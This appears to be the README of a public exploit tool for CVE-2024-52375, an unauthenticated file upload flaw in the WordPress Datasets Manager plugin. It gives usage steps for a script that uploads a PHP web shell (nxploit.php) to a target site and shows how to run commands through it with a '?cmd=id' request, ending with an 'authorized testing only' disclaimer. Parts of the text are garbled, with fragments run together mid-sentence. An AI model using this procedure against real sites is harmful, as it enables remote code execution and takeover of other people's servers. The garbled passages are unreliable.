
WordPress Datasets Manager by Arttia Creative plugin <= 1.5 - Arbitrary File Upload vulnerability
💥 Exploit by: Nxploit (Khaled Alenazi)
📅 CVE Published: November 14, 2024
🧠 CVSS Score: 10.0 (Critical)
🛠 CWE-434: Unrestricted Upload of File with Dangerous Type
A critical vulnerability was discovered in the Datasets Manager by Arttia Creative WordPress plugin, affecting all versions up to and including 1.5.
The plugin fails to properly validate file types during the upload process, allowing an unauthenticated attacker to upload arbitrary files — including PHP shells — and achieve Remote Code Execution (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests library:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Replace the URL with the full path to the target WordPress installation.
If successful, the script will:
_wpnonce from the frontend.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
You can then execute commands like:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 are vulnerable.This tool is provided for educational and authorized testing purposes only.
Using it against systems you do not own or have permission to test is illegal.